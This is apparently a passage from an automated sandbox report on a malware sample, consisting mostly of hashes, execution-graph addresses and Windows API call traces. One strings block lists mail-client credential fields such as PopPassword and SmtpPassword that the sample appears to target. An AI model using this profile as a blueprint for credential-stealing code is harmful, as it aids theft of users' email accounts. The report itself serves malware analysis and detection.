                        • Instruction Fuzzy Hash: 80E04C75A042189FDB55CF94CC91B9CBBB5AB4C310F248099AA0DAB395C6326E82CF40
                        Memory Dump Source
                        • Source File: 0000000E.00000002.383534411.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_1f50000_XxENUzWteJXT.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 666dd71310baf1ec2220375b3a78a147b144b9d7b8dbe327d07de1bacfa5f98b
                        • Instruction ID: 238e286ea3cc9a807084fd7693de8bec5d84723e79aca06a3ec03d7e60ae80f8
                        • Opcode Fuzzy Hash: 666dd71310baf1ec2220375b3a78a147b144b9d7b8dbe327d07de1bacfa5f98b
                        • Instruction Fuzzy Hash: 31C0127081310CDBD714DF9CD951B6D776CD781614F1010A9D90417250DA351900DBA1

                        Execution Graph

                        Execution Coverage:2.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:1.3%
                        Total number of Nodes:299
                        Total number of Limit Nodes:12
                        execution_graph 8940 408952 8961 40823f 8940->8961 8943 408960 8945 4056bf 2 API calls 8943->8945 8946 40896a 8945->8946 8989 408862 8946->8989 8948 4089c4 8949 413aca 4 API calls 8948->8949 8950 4089d4 8949->8950 8952 405695 2 API calls 8950->8952 8951 408975 8951->8948 8997 4087d6 8951->8997 8954 4089df 8952->8954 8959 402bab 2 API calls 8960 40899d 8959->8960 8960->8948 8960->8959 8962 40824d 8961->8962 8963 40831b 8962->8963 8964 4031e5 3 API calls 8962->8964 8963->8943 8977 4083bb 8963->8977 8965 40826d 8964->8965 8966 4031e5 3 API calls 8965->8966 8967 408289 8966->8967 8968 4031e5 3 API calls 8967->8968 8969 4082a5 8968->8969 8970 4031e5 3 API calls 8969->8970 8971 4082c1 8970->8971 8972 4031e5 3 API calls 8971->8972 8973 4082e2 8972->8973 8974 4031e5 3 API calls 8973->8974 8975 4082ff 8974->8975 8976 4031e5 3 API calls 8975->8976 8976->8963 9025 408363 8977->9025 8980 4084ab 8980->8943 8981 4056bf 2 API calls 8986 4083f4 8981->8986 8982 408492 8983 413aca 4 API calls 8982->8983 8984 4084a0 8983->8984 8985 405695 2 API calls 8984->8985 8985->8980 8986->8982 9028 40815d 8986->9028 9043 40805d 8986->9043 9058 404b8f 8989->9058 8991 40887e 8992 4031e5 3 API calls 8991->8992 8993 40893e 8991->8993 8995 408946 8991->8995 8996 402b7c 2 API calls 8991->8996 8992->8991 9061 404a39 8993->9061 8995->8951 8996->8991 8998 402b7c 2 API calls 8997->8998 8999 4087e7 8998->8999 9000 4031e5 3 API calls 8999->9000 9002 40885a 8999->9002 9004 408802 9000->9004 9001 402bab 2 API calls 9001->9002 9009 408749 9002->9009 9005 40884d 9004->9005 9008 408853 9004->9008 9070 408522 9004->9070 9074 4084b4 9004->9074 9077 4084d4 9005->9077 9008->9001 9010 404b8f 3 API calls 9009->9010 9011 408765 9010->9011 9012 4031e5 3 API calls 9011->9012 9013 408522 3 API calls 9011->9013 9014 4087c7 9011->9014 9016 4087cf 9011->9016 9012->9011 9013->9011 9015 404a39 4 API calls 9014->9015 9015->9016 9017 4085d1 9016->9017 9018 4086c2 9017->9018 9021 4085e9 9017->9021 9018->8960 9020 402bab 2 API calls 9020->9021 9021->9018 9021->9020 9022 4031e5 3 API calls 9021->9022 9083 4089e6 9021->9083 9102 4086c9 9021->9102 9106 4036a3 9021->9106 9022->9021 9026 4031e5 3 API calls 9025->9026 9027 408386 9026->9027 9027->8980 9027->8981 9029 40816f 9028->9029 9030 4081b6 9029->9030 9031 4081fd 9029->9031 9042 4081ef 9029->9042 9033 405872 4 API calls 9030->9033 9032 405872 4 API calls 9031->9032 9034 408213 9032->9034 9035 4081cf 9033->9035 9036 405872 4 API calls 9034->9036 9037 405872 4 API calls 9035->9037 9038 408222 9036->9038 9039 4081df 9037->9039 9040 405872 4 API calls 9038->9040 9041 405872 4 API calls 9039->9041 9040->9042 9041->9042 9042->8986 9044 40808c 9043->9044 9045 4080d2 9044->9045 9046 408119 9044->9046 9057 40810b 9044->9057 9047 405872 4 API calls 9045->9047 9048 405872 4 API calls 9046->9048 9049 4080eb 9047->9049 9050 40812f 9048->9050 9051 405872 4 API calls 9049->9051 9052 405872 4 API calls 9050->9052 9053 4080fb 9051->9053 9054 40813e 9052->9054 9055 405872 4 API calls 9053->9055 9056 405872 4 API calls 9054->9056 9055->9057 9056->9057 9057->8986 9064 404a19 9058->9064 9067 4049ff 9061->9067 9063 404a44 9063->8995 9065 4031e5 3 API calls 9064->9065 9066 404a2c 9065->9066 9066->8991 9068 4031e5 3 API calls 9067->9068 9069 404a12 RegCloseKey 9068->9069 9069->9063 9071 408534 9070->9071 9073 4085af 9071->9073 9080 4084ee 9071->9080 9073->9004 9075 4031e5 3 API calls 9074->9075 9076 4084c7 9075->9076 9076->9004 9078 4031e5 3 API calls 9077->9078 9079 4084e7 9078->9079 9079->9008 9081 4031e5 3 API calls 9080->9081 9082 408501 9081->9082 9082->9073 9084 4031e5 3 API calls 9083->9084 9085 408a06 9084->9085 9086 4031e5 3 API calls 9085->9086 9090 408b21 9085->9090 9089 408a32 9086->9089 9087 408b17 9118 403649 9087->9118 9089->9087 9109 403666 9089->9109 9090->9021 9093 408b0e 9115 40362f 9093->9115 9095 4031e5 3 API calls 9096 408a88 9095->9096 9096->9093 9097 4031e5 3 API calls 9096->9097 9098 408ac4 9097->9098 9099 405b6f 5 API calls 9098->9099 9100 408aff 9099->9100 9100->9093 9112 408508 9100->9112 9103 4086e2 9102->9103 9105 408744 9102->9105 9104 405872 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9103->9104 9103->9105 9104->9103 9105->9021 9107 4031e5 3 API calls 9106->9107 9108 4036b5 9107->9108 9108->9021 9110 4031e5 3 API calls 9109->9110 9111 403679 9110->9111 9111->9093 9111->9095 9113 4031e5 3 API calls 9112->9113 9114 40851b 9113->9114 9114->9093 9116 4031e5 3 API calls 9115->9116 9117 403642 9116->9117 9117->9087 9119 4031e5 3 API calls 9118->9119 9120 40365c 9119->9120 9120->9090 8060 402c1f 8063 4031e5 8060->8063 8064 4031f3 8063->8064 8065 403236 8063->8065 8064->8065 8067 403208 8064->8067 8074 4030a5 8065->8074 8080 403263 8067->8080 8069 4031e5 3 API calls 8071 402c31 LoadLibraryW 8069->8071 8070 40320d 8070->8071 8072 4030a5 3 API calls 8070->8072 8073 403224 8072->8073 8073->8069 8073->8071 8086 402ca4 8074->8086 8076 4030b0 8077 4030b5 8076->8077 8090 4030c4 8076->8090 8077->8073 8081 40326d 8080->8081 8085 4032b7 8081->8085 8099 402b7c GetProcessHeap HeapAlloc 8081->8099 8083 40328c 8084 402b7c 2 API calls 8083->8084 8084->8085 8085->8070 8087 403079 8086->8087 8089 40307c 8087->8089 8094 40317b GetPEB 8087->8094 8089->8076 8091 4030eb 8090->8091 8093 4030c0 8091->8093 8096 402c03 8091->8096 8093->8073 8095 40319b 8094->8095 8095->8089 8097 4031e5 3 API calls 8096->8097 8098 402c15 8097->8098 8098->8093 8100 402b98 8099->8100 8100->8083 8101 4139de 8110 413855 8101->8110 8103 4139f1 8104 413838 GetProcessHeap HeapAlloc GetPEB 8103->8104 8107 4139f7 8104->8107 8105 413866 21 API calls 8106 413a2d 8105->8106 8108 413b81 GetProcessHeap HeapAlloc GetPEB ExitProcess 8106->8108 8107->8105 8109 413a34 8108->8109 8111 4031e5 3 API calls 8110->8111 8112 413864 8111->8112 8112->8112 8059 404df3 WSAStartup 10666 40f980 10681 413c87 10666->10681 10668 40fa19 10669 40fa08 10670 402bab 2 API calls 10669->10670 10670->10668 10671 40f993 10671->10668 10671->10669 10672 40429b 3 API calls 10671->10672 10673 40f9ca 10672->10673 10703 4060bd 10673->10703 10678 412093 6 API calls 10679 40f9f6 10678->10679 10680 412093 6 API calls 10679->10680 10680->10669 10721 413d97 10681->10721 10684 404056 5 API calls 10686 413cad 10684->10686 10685 413c9f 10685->10671 10686->10685 10687 405b6f 5 API calls 10686->10687 10689 413d10 10687->10689 10688 413d7b 10692 402bab 2 API calls 10688->10692 10689->10688 10690 403c62 3 API calls 10689->10690 10691 413d1f 10690->10691 10691->10688 10693 413d5a 10691->10693 10694 413d2c 10691->10694 10692->10685 10696 405b6f 5 API calls 10693->10696 10695 405dc5 3 API calls 10694->10695 10697 413d33 10695->10697 10698 413d55 10696->10698 10697->10698 10700 405b6f 5 API calls 10697->10700 10699 402bab 2 API calls 10698->10699 10699->10688 10701 413d48 10700->10701 10702 402bab 2 API calls 10701->10702 10702->10698 10704 4031e5 3 API calls 10703->10704 10705 4060dd 10704->10705 10706 406126 10705->10706 10707 4031e5 3 API calls 10705->10707 10706->10669 10710 40650a 10706->10710 10708 40610f 10707->10708 10784 40604f 10708->10784 10711 4060ac 3 API calls 10710->10711 10712 406519 10711->10712 10713 4031e5 3 API calls 10712->10713 10714 406529 10713->10714 10715 406599 10714->10715 10716 4031e5 3 API calls 10714->10716 10715->10678 10717 406544 10716->10717 10718 40657f 10717->10718 10720 4031e5 3 API calls 10717->10720 10719 403c40 3 API calls 10718->10719 10719->10715 10720->10718 10722 413da0 10721->10722 10725 413c96 10721->10725 10727 4065a2 10722->10727 10725->10684 10725->10685 10726 405dc5 3 API calls 10726->10725 10742 404a52 10727->10742 10729 406638 10729->10725 10729->10726 10730 4065c0 10730->10729 10754 40393f 10730->10754 10733 406631 10734 402bab 2 API calls 10733->10734 10734->10729 10735 4059d8 3 API calls 10736 4065e9 10735->10736 10738 402b7c 2 API calls 10736->10738 10741 40662a 10736->10741 10737 402bab 2 API calls 10737->10733 10739 4065f8 10738->10739 10740 402bab 2 API calls 10739->10740 10740->10741 10741->10737 10743 402b7c 2 API calls 10742->10743 10745 404a65 10743->10745 10744 404ac6 10744->10730 10745->10744 10746 4031e5 3 API calls 10745->10746 10747 404a8a RegOpenKeyExA 10746->10747 10748 404aa0 10747->10748 10749 404aca 10747->10749 10750 4031e5 3 API calls 10748->10750 10751 402bab 2 API calls 10749->10751 10752 404ab1 RegQueryValueExA 10750->10752 10751->10744 10753 404a39 4 API calls 10752->10753 10753->10744 10761 403843 10754->10761 10757 403969 10757->10733 10757->10735 10759 403961 10760 402bab 2 API calls 10759->10760 10760->10757 10762 403861 10761->10762 10763 402b7c 2 API calls 10762->10763 10765 403875 10763->10765 10764 403923 10764->10757 10780 403aef 10764->10780 10765->10764 10766 4031e5 3 API calls 10765->10766 10767 40389b 10766->10767 10767->10764 10768 4031e5 3 API calls 10767->10768 10769 4038c5 10768->10769 10770 40392a 10769->10770 10772 403666 3 API calls 10769->10772 10771 403649 3 API calls 10770->10771 10771->10764 10773 4038e7 10772->10773 10773->10770 10774 4031e5 3 API calls 10773->10774 10775 403901 10774->10775 10775->10770 10776 403911 10775->10776 10777 40362f 3 API calls 10776->10777 10778 403919 10777->10778 10779 403649 3 API calls 10778->10779 10779->10764 10781 403afc 10780->10781 10782 402b7c 2 API calls 10781->10782 10783 403b16 10782->10783 10783->10759 10785 4031e5 3 API calls 10784->10785 10786 406062 10785->10786 10786->10706

                        Control-flow Graph

                        APIs
                        • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                        • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                        • GetLastError.KERNEL32 ref: 0041399E
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: Error$CreateLastModeMutex
                        • String ID:
                        • API String ID: 3448925889-0
                        • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                        • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                        • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                        • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                          • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                        • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                        • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3676486918-0
                        • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                        • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                        • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                        • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 82 404df3-404e16 WSAStartup
                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: Startup
                        • String ID:
                        • API String ID: 724789610-0
                        • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                        • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                        • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                        • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                        APIs
                        • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                        • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                        • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                        • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                        APIs
                        • ExitProcess.KERNELBASE(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                        • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                        • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                        • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                        APIs
                        • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                        • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                        • Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                        • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0040438F
                        • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                        • VariantInit.OLEAUT32(?), ref: 004043C4
                        • SysAllocString.OLEAUT32(?), ref: 004043CD
                        • VariantInit.OLEAUT32(?), ref: 00404414
                        • SysAllocString.OLEAUT32(?), ref: 00404419
                        • VariantInit.OLEAUT32(?), ref: 00404431
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: InitVariant$AllocString$CreateInitializeInstance
                        • String ID:
                        • API String ID: 1312198159-0
                        • Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                        • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                        • Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
                        • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                        Strings
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                        • API String ID: 0-2111798378
                        • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                        • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                        • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                        • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                        • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                        • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                        • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                        APIs
                        • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: recv
                        • String ID:
                        • API String ID: 1507349165-0
                        • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                        • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                        • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                        • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                        • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                        • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                        • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wmemset$ErrorLast
                        • String ID: IDA$IDA
                        • API String ID: 887189805-2020647798
                        • Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                        • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                        • Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
                        • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                        APIs
                        • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                        • socket.WS2_32(?,?,?), ref: 00404E7A
                        • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                        Memory Dump Source
                        • Source File: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_21_2_400000_XxENUzWteJXT.jbxd
                        Yara matches
                        Similarity
                        • API ID: freeaddrinfogetaddrinfosocket
                        • String ID:
                        • API String ID: 2479546573-0
                        • Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                        • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                        • Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
                        • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98